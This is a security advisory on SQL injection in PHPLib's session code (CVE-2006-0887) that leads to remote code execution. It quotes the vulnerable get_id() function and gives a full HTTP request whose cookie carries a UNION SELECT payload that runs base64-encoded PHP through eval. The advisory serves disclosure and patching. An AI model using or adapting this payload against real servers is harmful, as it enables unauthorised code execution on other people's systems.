Are you looking to have your application properly secured by an experienced professional? Contact us today for a free private consultation. We specialize in web application security, mobile security, and also offer general consultation services. Click here for more information regarding all of our security services.
PHPLib SQL Injection
Vendor: PHPLib
Product: PHPLib
Version: <= 7.4
Website: http://phplib.sourceforge.net/
BID: 16801
CVE: CVE-2006-0887 CVE-2006-2826
OSVDB: 23466
SECUNIA: 16902
Description:
The PHP Base Library aka PHPLib is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL Injection issues that in a worst case scenario can lead to remote code execution by using UNION and selecting arbitrary php code into an eval call. A new version og PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible.


Remote Code Execution:
There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution.
## Propagate the session id according to mode and lifetime.
## Will create a new id if necessary. To take over abandoned sessions,
## one may provide the new session id as a parameter (not recommended).

function get_id($id = "") {
global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$this->newid=true;

$this->name = $this->cookiename==""?$this->classname:$this->cookiename;

if ( "" == $id ) {
  $this->newid=false;
  switch ($this->mode) {
    case "get":
      $id = isset($HTTP_GET_VARS[$this->name]) ?
            $HTTP_GET_VARS[$this->name] :
            ( isset($HTTP_POST_VARS[$this->name]) ?
            $HTTP_POST_VARS[$this->name] :
            "") ;
    break;
    case "cookie":
      $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
            $HTTP_COOKIE_VARS[$this->name] : "";
    break;
    default:
      die("This has not been coded yet.");
    break;
  }
}

### do not accept user provided ids for creation
if($id != "" && $this->block_alien_sid) {   # somehow an id was provided by the user
   if($this->that->ac_get_value($id, $this->name) == "") {
      # no - the id doesn't exist in the database: Ignore it!
      $id = "";
   }
}

The above code is from sessions.inc @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call.
GET /phplib/pages/index.php3 HTTP/1.1
Host: example.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT
For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call.


Solution:
PHPLib 7.4a has been released to address these issues.


Credits:
James Bercegay of the GulfTech Security Research Team